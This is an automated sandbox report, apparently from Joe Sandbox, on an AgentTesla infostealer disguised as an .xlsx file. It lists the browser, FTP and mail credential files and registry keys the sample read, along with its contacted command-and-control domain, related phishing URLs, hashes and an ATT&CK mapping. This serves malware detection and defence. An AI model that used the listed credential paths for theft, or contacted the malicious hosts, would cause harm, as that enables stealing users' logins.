Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe33184d40.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe33184d40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2885370305.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2886508442.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1816336840.000001FE33147000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: M_F+niestandardowy stempel.xlsx.exe PID: 6696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 2060, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe33184d40.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe33184d40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2886508442.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2885370305.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2886508442.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2886508442.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1816336840.000001FE33147000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: M_F+niestandardowy stempel.xlsx.exe PID: 6696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 2060, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Scheduled Task/Job	211 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	1 Scheduled Task/Job	11 Obfuscated Files or Information	1 Credentials in Registry	231 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Timestomp	NTDS	1 Process Discovery	Distributed Component Object Model	1 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	151 Virtualization/Sandbox Evasion	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	151 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	211 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
M_F+niestandardowy stempel.xlsx.exe	8%	ReversingLabs	Win64.Infostealer.Generic

Source	Detection	Scanner	Label	Link
webmail.zerotime.com.cy	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://webmail.zerotime.com.cy	0%	Avira URL Cloud	safe
http://webmail.zerotime.com.cy	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	172.67.74.152	true	false		high
webmail.zerotime.com.cy	23.235.199.60	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ipify.org	M_F+niestandardowy stempel.xlsx.exe, 00000000.00000002.1816336840.000001FE33147000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000002.00000002.2886508442.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000002.00000002.2885370305.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.6.dr	false		high
https://account.dyn.com/	M_F+niestandardowy stempel.xlsx.exe, 00000000.00000002.1816336840.000001FE33147000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000002.00000002.2885370305.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://api.ipify.org/t	AddInProcess32.exe, 00000002.00000002.2886508442.0000000002F71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://webmail.zerotime.com.cy	AddInProcess32.exe, 00000002.00000002.2886508442.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	AddInProcess32.exe, 00000002.00000002.2886508442.0000000002F71000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.235.199.60	webmail.zerotime.com.cy	United States		54641	INMOTI-1US	true
172.67.74.152	api.ipify.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430838
Start date and time:	2024-04-24 09:45:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	M_F+niestandardowy stempel.xlsx.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@7/5@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 87% Number of executed functions: 75 Number of non-executed functions: 8
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.89.179.12
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:46:03	API Interceptor	22x Sleep call for process: AddInProcess32.exe modified
09:46:16	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.74.152	Sonic-Glyder.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json
	Sky-Beta-Setup.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	SongOfVikings.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json
	SongOfVikings.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json
	Sky-Beta Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	responsibilityleadpro.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	F#U0130YAT TEKL#U0130F.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	104.26.12.205
	New DHL Shipment Document Arrival Notice.pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	hesaphareketi_1.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	DHL Shipping doc.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	purchase order pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	PO 23JC0704-Rollease-B.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	BARSYL SHIPPING Co (VIETNAM).exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	SecuriteInfo.com.Python.Stealer.1437.14994.32063.exe	Get hash	malicious	Python Stealer	Browse	172.67.74.152
	https://wmicrosouab-4ba8.udydzj.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
INMOTI-1US	http://x-elon.fyi	Get hash	malicious	GRQ Scam	Browse	173.231.220.79
	KZWCMNWmmqi9lvI.exe	Get hash	malicious	AgentTesla	Browse	198.46.88.214
	tmjGCGOEGMinVPD.exe	Get hash	malicious	AgentTesla	Browse	198.46.88.214
	eTo4MkEQvX.exe	Get hash	malicious	AgentTesla	Browse	198.46.88.214
	Quotation[MPI-240401.exe	Get hash	malicious	AgentTesla	Browse	198.46.88.214
	https://gcv.microsoft.us/kgRWagmalJ	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	173.231.215.6
	http://bookkeepers.com/	Get hash	malicious	Unknown	Browse	199.250.194.144
	http://bookkeepers.com	Get hash	malicious	Unknown	Browse	199.250.194.144
	http://aitcaid.com	Get hash	malicious	Unknown	Browse	199.250.194.144
	fuggy.vbs	Get hash	malicious	GuLoader, XWorm	Browse	144.208.78.130
CLOUDFLARENETUS	rq0mVjR9ar.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	172.67.139.220
	https://220420241.blob.core.windows.net/web/index.html?id=999	Get hash	malicious	Unknown	Browse	1.1.1.1
	responsibilityleadpro.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DU_vL_MRfqZW9nS4IDBSHT8MfJfSAq9b0aOVvtJoUhpW1Ga8ePAnfV-2FfXwE0xIGnayeXag21qNKRc5VLcgMkPlIuCBf7Hi8EFUvj1-2FlklJpMLZNx1IQq8eO26tVdmeuxhGn-2B2zjA71oEkiC9pTrxX9Dz-2FMJk8mkJr62ye1KlBo-2B8fxBlVl-2B6T0POpB0GKoibGhcjh4Z-2FnPU453nMAkUkNy65MlaA-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	iwjvkEAIQa.rtf	Get hash	malicious	Unknown	Browse	172.67.187.200
	8jvTeVxooN.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	172.67.139.220
	xF3wienia PO2102559-1.xlsx	Get hash	malicious	Unknown	Browse	172.67.215.45
	https://tibusiness.cl/css/causarol.rar	Get hash	malicious	Unknown	Browse	1.1.1.1
	F#U0130YAT TEKL#U0130F.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	104.26.12.205
	http://damarltda.cl/certificado.php	Get hash	malicious	Unknown	Browse	162.159.61.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DU_vL_MRfqZW9nS4IDBSHT8MfJfSAq9b0aOVvtJoUhpW1Ga8ePAnfV-2FfXwE0xIGnayeXag21qNKRc5VLcgMkPlIuCBf7Hi8EFUvj1-2FlklJpMLZNx1IQq8eO26tVdmeuxhGn-2B2zjA71oEkiC9pTrxX9Dz-2FMJk8mkJr62ye1KlBo-2B8fxBlVl-2B6T0POpB0GKoibGhcjh4Z-2FnPU453nMAkUkNy65MlaA-3D-3D	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	F#U0130YAT TEKL#U0130F.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	172.67.74.152
	New DHL Shipment Document Arrival Notice.pdf.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	hesaphareketi_1.scr.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	e-dekont.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.74.152
	DAIKIN AC SPAIN 2024.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	transferencia.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	1000901 LIQUIDACION.vbs	Get hash	malicious	FormBook, GuLoader	Browse	172.67.74.152
	Zapytanie ofertowe (7427-23 ROCKFIN).vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_M_F+niestandardo_fb838ddbb7a53927da742c4ca68b8bbcd9a1_fcd16283_fd1c0569-ded8-4609-a847-49845e6beddc\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.014524131062362
Encrypted:	false
SSDEEP:	192:wS6QZPM50UnUFaWBHah1zuiFGZ24lO8Fh:YEPhUnUFamHazzuiFGY4lO8Fh
MD5:	AB1DB9CCF7AB5714C56851E5CFF96710
SHA1:	3F57026696565742BBDF137FE2E3140AAABB34C0
SHA-256:	525EAD67D6E84BDB17701C471455D5AA39D3C081A7FF66E992624E0AA24AF3CB
SHA-512:	C78E3852A47A8E5BD0B0021D688E396C6153AC247DE8919F54E8EC2D94C1D1087740D3F559DC544142B7FC8BCD8A12551C797BD97C07A6B25B36FFE95E8C9D17
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.4.1.8.3.6.2.1.7.7.2.5.0.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.4.1.8.3.6.2.8.6.4.7.6.9.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.1.c.0.5.6.9.-.d.e.d.8.-.4.6.0.9.-.a.8.4.7.-.4.9.8.4.5.e.6.b.e.d.d.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.2.d.1.e.1.5.c.-.7.5.b.e.-.4.c.b.9.-.9.2.c.c.-.d.f.2.4.9.a.4.4.b.f.7.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.M._.F.+.n.i.e.s.t.a.n.d.a.r.d.o.w.y. .s.t.e.m.p.e.l...x.l.s.x...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.U.r.u.y.a.l.a.g.e.r.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.2.8.-.0.0.0.1.-.0.0.1.4.-.d.8.5.2.-.2.f.7.3.1.b.9.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.7.c.f.0.d.8.4.5.a.f.4.b.b.7.3.f.d.2.c.3.e.8.a.7.5.a.7.8.8.6.8.0.0.0.0.0.0.0.0.!.0.0.0.0.6.b.8.2.0.6.d.5.5.5.4.c.0.5.2.e.6.5.2.b.6.7.a.f.5.7.b.3.2.e.d.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA9A1.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Wed Apr 24 07:46:02 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	436083
Entropy (8bit):	3.2911168037602305
Encrypted:	false
SSDEEP:	3072:llVeqrlFz0q4LmzcSPiWJu1CCqjdqZ4UU33+v6TQVp3u4:lWQRiqkZG3QGQ3
MD5:	BC029556A686A5B966A27B86E3E81F2E
SHA1:	1A0A514AC1D4548C0422E79249C9E8B618CB1AEE
SHA-256:	7A9CE77692C6D77C32C509BD17C6012D2FCB068B012F8800265D98BA2D700230
SHA-512:	5DF2BCBC6EA8E77604A35E39DED8A699FB06A1AE12901A58527C252839DA4C3ACCB23B1D73E9B0D285CE129AD334737F77FC859F6ECF00C134A8181D55880DD9
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........(f............D...............d.......$...d........ ..........4O.............l.......8...........T...........h*...}...........=...........>..............................................................................eJ.......?......Lw......................T.......(.....(f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAAFA.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8690
Entropy (8bit):	3.708899833939323
Encrypted:	false
SSDEEP:	192:R6l7wVeJOiU6Y96kXgmf76Jopr+89b7KCfVCvJm:R6lXJzU6YgkXgmf7ia7/fP
MD5:	9736798F7917B7D742A43EC908370D21
SHA1:	6811D83B6522628FACF002B06DC9E876DE8152F9
SHA-256:	900EB7ABD912844187A7EA58A8684667610BE4A09EBACE4A5EB1BC58CF3E02E2
SHA-512:	A5D287AEDF0649B152E2FB4308C01CFD6F21C109989D12887EF97B8EA3DE9928B1BEDDB9AB0844529C6A08BA8D91362B35D6BE087F30C905D0C309E4FAEB1213
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.9.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB39.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4865
Entropy (8bit):	4.542186129129582
Encrypted:	false
SSDEEP:	48:cvIwWl8zsCJg771I9daWpW8VYFYm8M4JVwmAFcyq851IXCA8rVgrd:uIjfQI7Ob7V9JVLqJAWVgrd
MD5:	7B015B86F9DC879E04941E9651D32C0B
SHA1:	8F5C2137037C817A1596A8F2D4A0E7341DBB2B31
SHA-256:	1FF18FE94CAF2383873E952FE2E91B1A4C6879F64F0D6DE7C01B634DC0971DED
SHA-512:	04DEFE1CE5C46A368B8925ED49F3598220365E78C762A4C126E0F431375283586EB1B441EE2E7562245808ED7E8072AAF76FC9A42C85FBA74C433F6C9CD480A4
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="293688" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.466063320975219
Encrypted:	false
SSDEEP:	6144:IIXfpi67eLPU9skLmb0b4YWSPKaJG8nAgejZMMhA2gX4WABl0uNSdwBCswSbM:dXD94YWlLZMM6YFHY+M
MD5:	80CFE681B4F45C2CEC62DA6C96BB8BC7
SHA1:	C3329AAF02924623B46358445F4C8F9CC06585D7
SHA-256:	E8BF423898BDABE893B006508720D3765F90DB84777F58AFB6C741E254A47F9A
SHA-512:	B522BFC8A95E0329F160C5594A508730D7AE199472407BB7A48D64D3B481FB4DF637A20CED8CE336A466EAFB8D5B1732E797EFE2D9F1F1901415B639E8E45071
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm&uLt.................................................................................................................................................................................................................................................................................................................................................yZ@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.426781616516859
TrID:	Win64 Executable Console Net Framework (206006/5) 48.58% Win64 Executable Console (202006/5) 47.64% Win64 Executable (generic) (12005/4) 2.83% Generic Win/DOS Executable (2004/3) 0.47% DOS Executable Generic (2002/1) 0.47%
File name:	M_F+niestandardowy stempel.xlsx.exe
File size:	1'014'893 bytes
MD5:	32ff58faa9596522b0062f2692b0d96a
SHA1:	6b8206d5554c052e652b67af57b32ede5ceb5bd6
SHA256:	64da1a2af5fbbd35867312aa68bfedd2dc695cf8bdac16e6974237226ebb8cc0
SHA512:	4d47708e17cebc4cbfc1b38b386087e4b13a3aa12b842d2e2c8001cfaac9f81bc2d9975d2b240718a435d33ca7dca060eeb441457bdd0ff6062424cf5bdeb324
SSDEEP:	24576:g0QxZr8OxebDlnyLqZOV/r47BOhqT8Nxg:gtr8O0bBJOp47qJg
TLSH:	EF25BF5273F8156AF7FB4B78A87466445EF6FED22A41FA9C5840C10E0C62F8099693F3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...4............."...0.H2............... ....@...... ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
